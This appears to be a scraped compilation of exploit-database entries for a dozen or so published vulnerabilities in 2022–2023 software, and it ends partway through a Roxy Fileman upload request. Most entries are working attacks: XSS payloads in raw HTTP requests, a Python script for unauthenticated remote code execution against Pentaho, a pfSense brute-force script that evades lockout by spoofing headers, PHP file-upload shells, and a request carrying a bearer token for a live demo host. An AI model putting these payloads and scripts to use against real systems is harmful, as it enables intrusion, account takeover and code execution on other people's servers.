ISHACK AI BOT

# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS) # Exploit Author: omurugur # Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117 # Version: 10.7.4-10.7.13 # Tested on: [relevant os] # CVE : CVE-2022-25630 # Author Web: https://www.justsecnow.com # Author Social: @omurugurrr An authenticated user can embed malicious content with XSS into the admin group policy page. Example payload *"/><svg/onload=prompt(document.domain)>* POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo HTTP/1.1 Host: X.X.X.X Cookie: JSESSIONID=xxxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 652 Origin: https://x.x.x.x Referer: https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000 Regards, Omur UGUR

# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) # Exploit Author: omurugur # Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020 # Version: 6.5.0 - 6.2.0 - 6.1.0 # Tested on: [relevant os] # CVE : CVE-2022-0020 # Author Web: https://www.justsecnow.com # Author Social: @omurugurrr A stored cross-site scripting (XSS) vulnerability in Palo Alto Network Cortex XSOAR web interface enables an authenticated network-based attacker to store a persistent javascript payload that will perform arbitrary actions in the Cortex XSOAR web interface on behalf of authenticated administrators who encounter the payload during normal operations. POST /acc_UAB(MAY)/incidentfield HTTP/1.1 Host: x.x.x.x Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x; isTimLicense=false User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://x.x.x.x/acc_UAB(MAY) Content-Type: application/json X-Xsrf-Token: Api_truncate_results: true Origin: https://x.x.x.x Content-Length: 373 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close {"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false} Regards, Omur UGUR >

## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 03.30.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html ## Reference: https://portswigger.net/web-security/file-upload ## Description: The malicious user can request an account from the administrator of this system. Then he can use this vulnerability to destroy or get access to all accounts of this system, even more, worst than ever. The malicious user can upload a very dangerous file on this server, and he can execute it via shell, this is because he can access the upload function from the administrator account. The status is CRITICAL. STATUS: HIGH Vulnerability [+]Exploit: ```mysql <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ; // New Name For The File $new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0) ## Proof and Exploit: [href](https://streamable.com/szb9qy) ## Time spend: 00:45:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) # Exploit Author: Betul Denizler # Vendor Homepage: https://x2crm.com/ # Software Link: https://sourceforge.net/projects/x2engine/ # Version: X2CRM v6.6/6.9 # Tested on: Ubuntu Mate 20.04 # Vulnerable Parameter: Actions[subject] # CVE: CVE-2022-48178 # Date: 27.12.2022 ''' POC REQUEST: ======== POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 172 Origin: http://localhost Connection: close Referer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1 Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test EXPLOITATION ======== 1. Create an action 2. Inject payload to the vulnerable parameter in POST request Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E '''

# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) # Exploit Author: Betul Denizler # Vendor Homepage: https://x2crm.com/ # Software Link: https://sourceforge.net/projects/x2engine/ # Version: X2CRM v6.6/6.9 # Tested on: Ubuntu Mate 20.04 # Vulnerable Parameter: model # CVE: Use CVE-2022-48177 # Date: 27.12.2022 ''' POC REQUEST: ======== GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 EXPLOITATION ======== 1. Select Import Records Model in admin settings 2. Inject payload to the vulnerable parameter in GET request Payload: "><body onload="alert(4)"> '''

# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) # Date: 2023-03-30 # CVE: CVE-2023-26692 # Exploit Author: Abdulaziz Saad (@b4zb0z) # Vendor Homepage: https://www.zcbs.nl # Version: 4.14k # Tested on: LAMP, Ubuntu # Google Dork: inurl:objecten.pl?ident=3D --- [#] Vulnerability : `$_GET['ident']` [#] Exploitation : `https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror= =3Dalert(%22XSS%22)%3E`

Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS) Application: WebsiteBaker Version: 2.13.3 Bugs: Stored XSS Technology: PHP Vendor URL: https://websitebaker.org/pages/en/home.php Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Date of found: 02.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1.Anyone who has the authority to create the page can do this payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E POST /admin/pages/add.php HTTP/1.1 Host: localhost Content-Length: 137 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: null Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9 Connection: close b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add 2. Visit http://localhost/

# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated) # Author: dwbzn # Date: 2022-04-04 # Vendor: https://www.hitachivantara.com/ # Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html # Version: Pentaho BA Server 9.3.0.0-428 # CVE: CVE-2022-43769, CVE-2022-43939 # Tested on: Windows 11 # Credits: https://research.aurainfosec.io/pentest/pentah0wnage # NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe). # Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage) import requests import argparse parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI') parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho') parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False) args = parser.parse_args() url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a" print ("running...") r = requests.get(url) if r.text == 'false': print ("command should've executed! nice.") else: print ("didn't work. sadge...")

# Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2023-04-05 # Vendor : https://www.eset.com # Version : 16.0.26.0 # Tested on OS: Microsoft Windows 11 pro x64 #PoC : ============== C:\>sc qc ekrn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ekrn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe" LOAD_ORDER_GROUP : Base TAG : 0 DISPLAY_NAME : ESET Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

#!/usr/bin/python3 ## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass ## Google Dork: intitle:"pfSense - Login" ## Date: 2023-04-07 ## Exploit Author: FabDotNET (Fabien MAISONNETTE) ## Vendor Homepage: https://www.pfsense.org/ ## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz ## Version: pfSenseCE <= 2.6.0 ## CVE: CVE-2023-27100 # Vulnerability ## CVE: CVE-2023-27100 ## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100 ## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc ## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66 import requests import sys import re import argparse import textwrap from urllib3.exceptions import InsecureRequestWarning # Expected Arguments parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : ./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt ./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)") parser.add_argument("-u", "--usersList", help="Username Dictionary") parser.add_argument("-p", "--passwdList", help="Password Dictionary") args = parser.parse_args() if len(sys.argv) < 2: print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]") sys.exit(1) # Variable url = args.url usersList = args.usersList passwdList = args.passwdList # Suppress only the single warning from urllib3 needed. if url.upper().startswith("HTTPS://"): requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass') def login(userlogin, userpasswd): session = requests.session() r = session.get(url, verify=False) # Getting CSRF token value csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text) csrftoken = csrftoken.group(1) # Specifying Headers Value headerscontent = { 'User-Agent': 'Mozilla/5.0', 'Referer': f"{url}", 'X-Forwarded-For': '42.42.42.42' } # POST REQ data postreqcontent = { '__csrf_magic': f"{csrftoken}", 'usernamefld': f"{userlogin}", 'passwordfld': f"{userpasswd}", 'login': 'Sign+In' } # Sending POST REQ r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False) # Conditional loops if r.status_code != 200: print(f'[*] - Found Valid Credential !!') print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}") sys.exit(0) # Reading User.txt & Pass.txt files userfile = open(usersList).readlines() passfile = open(passwdList).readlines() for user in userfile: user = user.strip() for passwd in passfile: passwd = passwd.strip() login(user, passwd)

Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) Application: dotclear Version: 2.25.3 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://dotclear.org/ Software Link: https://dotclear.org/download Date of found: 08.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== While writing a blog post, we know that we can upload images. But php did not allow file upload. This time <?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it. We were able to run the php code when we visited your page poc request: POST /dotclear/admin/post.php HTTP/1.1 Host: localhost Content-Length: 566 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc Connection: close post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password= poc video : https://youtu.be/oIPyLqLJS70

## Exploit Title: ever gauzy v0.281.9 - JWT weak HMAC secret ## Author: nu11secur1ty ## Date: 04.08.2023 ## Vendor: https://gauzy.co/ ## Software: https://github.com/ever-co/ever-gauzy/releases/tag/v0.281.9 ## Reference: https://portswigger.net/kb/issues/00200903_jwt-weak-hmac-secret ## Description: It was, detected a JWT signed using a well-known `HMAC secret key`. The key used which was found was a secret Key. The user can find a secret key authentication while sending normal post requests. After he found the `Authorization: Bearer` key he can use it to authenticate and he can be sending a very malicious POST request, it depends on the scenario. STATUS: [+]Issue: JWT weak HMAC secret [+]Severity: High [+]Exploit: ```GET GET /api/auth/authenticated HTTP/2 Host: apidemo.gauzy.co Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112" Accept: application/json, text/plain, */* Language: en Sec-Ch-Ua-Mobile: ?0 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjJjMWViM2ViLTI3ZDEtNGE2Ni05YjEzLTg4ODVhNmFhYWJlMiIsInRlbmFudElkIjoiMTA0YjhiMDQtNmYzNi00YWMzLWFjNWItNTg4MWQyNjJmMWUxIiwiZW1wbG95ZWVJZCI6bnVsbCwicm9sZSI6IlNVUEVSX0FETUlOIiwicGVybWlzc2lvbnMiOlsiQURNSU5fREFTSEJPQVJEX1ZJRVciLCJURUFNX0RBU0hCT0FSRCIsIlBST0pFQ1RfTUFOQUdFTUVOVF9EQVNIQk9BUkQiLCJUSU1FX1RSQUNLSU5HX0RBU0hCT0FSRCIsIkFDQ09VTlRJTkdfREFTSEJPQVJEIiwiSFVNQU5fUkVTT1VSQ0VfREFTSEJPQVJEIiwiT1JHX1BBWU1FTlRfVklFVyIsIk9SR19QQVlNRU5UX0FERF9FRElUIiwiT1JHX0lOQ09NRVNfVklFVyIsIk9SR19JTkNPTUVTX0VESVQiLCJPUkdfRVhQRU5TRVNfVklFVyIsIk9SR19FWFBFTlNFU19FRElUIiwiUFJPRklMRV9FRElUIiwiRU1QTE9ZRUVfRVhQRU5TRVNfVklFVyIsIkVNUExPWUVFX0VYUEVOU0VTX0VESVQiLCJPUkdfUFJPUE9TQUxTX1ZJRVciLCJPUkdfUFJPUE9TQUxTX0VESVQiLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX1ZJRVciLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX0VESVQiLCJPUkdfVEFTS19BREQiLCJPUkdfVEFTS19WSUVXIiwiT1JHX1RBU0tfRURJVCIsIk9SR19UQVNLX0RFTEVURSIsIk9SR19USU1FX09GRl9WSUVXIiwiT1JHX0VNUExPWUVFU19WSUVXIiwiT1JHX0VNUExPWUVFU19FRElUIiwiT1JHX0NBTkRJREFURVNfVklFVyIsIk9SR19DQU5ESURBVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV19WSUVXIiwiT1JHX0NBTkRJREFURVNfRE9DVU1FTlRTX1ZJRVciLCJPUkdfQ0FORElEQVRFU19UQVNLX0VESVQiLCJPUkdfQ0FORElEQVRFU19GRUVEQkFDS19FRElUIiwiT1JHX0lOVkVOVE9SWV9QUk9EVUNUX0VESVQiLCJPUkdfSU5WRU5UT1JZX1ZJRVciLCJPUkdfVEFHU19BREQiLCJPUkdfVEFHU19WSUVXIiwiT1JHX1RBR1NfRURJVCIsIk9SR19UQUdTX0RFTEVURSIsIk9SR19VU0VSU19WSUVXIiwiT1JHX1VTRVJTX0VESVQiLCJPUkdfSU5WSVRFX1ZJRVciLCJPUkdfSU5WSVRFX0VESVQiLCJBTExfT1JHX1ZJRVciLCJBTExfT1JHX0VESVQiLCJQT0xJQ1lfVklFVyIsIlBPTElDWV9FRElUIiwiVElNRV9PRkZfRURJVCIsIlJFUVVFU1RfQVBQUk9WQUxfVklFVyIsIlJFUVVFU1RfQVBQUk9WQUxfRURJVCIsIkFQUFJPVkFMU19QT0xJQ1lfVklFVyIsIkFQUFJPVkFMU19QT0xJQ1lfRURJVCIsIkNIQU5HRV9TRUxFQ1RFRF9FTVBMT1lFRSIsIkNIQU5HRV9TRUxFQ1RFRF9DQU5ESURBVEUiLCJDSEFOR0VfU0VMRUNURURfT1JHQU5JWkFUSU9OIiwiQ0hBTkdFX1JPTEVTX1BFUk1JU1NJT05TIiwiQUNDRVNTX1BSSVZBVEVfUFJPSkVDVFMiLCJUSU1FU0hFRVRfRURJVF9USU1FIiwiU1VQRVJfQURNSU5fRURJVCIsIlBVQkxJQ19QQUdFX0VESVQiLCJJTlZPSUNFU19WSUVXIiwiSU5WT0lDRVNfRURJVCIsIkVTVElNQVRFU19WSUVXIiwiRVNUSU1BVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdFUlNfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV0VSU19WSUVXIiwiVklFV19BTExfRU1BSUxTIiwiVklFV19BTExfRU1BSUxfVEVNUExBVEVTIiwiT1JHX0hFTFBfQ0VOVEVSX0VESVQiLCJWSUVXX1NBTEVTX1BJUEVMSU5FUyIsIkVESVRfU0FMRVNfUElQRUxJTkVTIiwiQ0FOX0FQUFJPVkVfVElNRVNIRUVUIiwiT1JHX1NQUklOVF9WSUVXIiwiT1JHX1NQUklOVF9FRElUIiwiT1JHX0NPTlRBQ1RfRURJVCIsIk9SR19DT05UQUNUX1ZJRVciLCJPUkdfUFJPSkVDVF9BREQiLCJPUkdfUFJPSkVDVF9WSUVXIiwiT1JHX1BST0pFQ1RfRURJVCIsIk9SR19QUk9KRUNUX0RFTEVURSIsIk9SR19URUFNX0FERCIsIk9SR19URUFNX1ZJRVciLCJPUkdfVEVBTV9FRElUIiwiT1JHX1RFQU1fREVMRVRFIiwiT1JHX1RFQU1fSk9JTl9SRVFVRVNUX1ZJRVciLCJPUkdfVEVBTV9KT0lOX1JFUVVFU1RfRURJVCIsIk9SR19DT05UUkFDVF9FRElUIiwiRVZFTlRfVFlQRVNfVklFVyIsIlRJTUVfVFJBQ0tFUiIsIlRFTkFOVF9BRERfRVhJU1RJTkdfVVNFUiIsIklOVEVHUkFUSU9OX1ZJRVciLCJGSUxFX1NUT1JBR0VfVklFVyIsIlBBWU1FTlRfR0FURVdBWV9WSUVXIiwiU01TX0dBVEVXQVlfVklFVyIsIkNVU1RPTV9TTVRQX1ZJRVciLCJJTVBPUlRfRVhQT1JUX1ZJRVciLCJNSUdSQVRFX0dBVVpZX0NMT1VEIiwiT1JHX0pPQl9FTVBMT1lFRV9WSUVXIiwiT1JHX0pPQl9NQVRDSElOR19WSUVXIiwiSU5WRU5UT1JZX0dBTExFUllfQUREIiwiSU5WRU5UT1JZX0dBTExFUllfVklFVyIsIklOVkVOVE9SWV9HQUxMRVJZX0VESVQiLCJJTlZFTlRPUllfR0FMTEVSWV9ERUxFVEUiLCJNRURJQV9HQUxMRVJZX0FERCIsIk1FRElBX0dBTExFUllfVklFVyIsIk1FRElBX0dBTExFUllfRURJVCIsIk1FRElBX0dBTExFUllfREVMRVRFIiwiT1JHX0VRVUlQTUVOVF9WSUVXIiwiT1JHX0VRVUlQTUVOVF9FRElUIiwiT1JHX0VRVUlQTUVOVF9TSEFSSU5HX1ZJRVciLCJPUkdfRVFVSVBNRU5UX1NIQVJJTkdfRURJVCIsIkVRVUlQTUVOVF9NQUtFX1JFUVVFU1QiLCJFUVVJUE1FTlRfQVBQUk9WRV9SRVFVRVNUIiwiT1JHX1BST0RVQ1RfVFlQRVNfVklFVyIsIk9SR19QUk9EVUNUX1RZUEVTX0VESVQiLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX1ZJRVciLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX0VESVQiLCJWSUVXX0FMTF9BQ0NPVU5USU5HX1RFTVBMQVRFUyIsIlRFTkFOVF9TRVRUSU5HIiwiQUxMT1dfREVMRVRFX1RJTUUiLCJBTExPV19NT0RJRllfVElNRSIsIkFMTE9XX01BTlVBTF9USU1FIiwiREVMRVRFX1NDUkVFTlNIT1RTIl0sImlhdCI6MTY4MDk4MDAzMn0.3zm2CQ0udVj5VCBYgPPD8BzkhQ_5TgVVi91sN7eMKlw User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.gauzy.co Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.gauzy.co/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Length: 76 { "email":"[email protected]", "password": "adminrrrrrrrrrrrrrrrrrrrrrHACKED" } ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/gauzy.co/2023/ever-gauzy-v0.281.9) ## Proof and Exploit: [href](https://streamable.com/afsmee) ## Time spend: 03:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Upload # Date: 09/04/2023 # Exploit Author: Zer0FauLT [[email protected]] # Vendor Homepage: roxyfileman.com # Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net # Version: <= 1.4.5 # Tested on: Windows 10 and Windows Server 2019 # CVE : 0DAY ########################################################################################## # First, we upload the .jpg shell file to the server. # ########################################################################################## POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 666 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 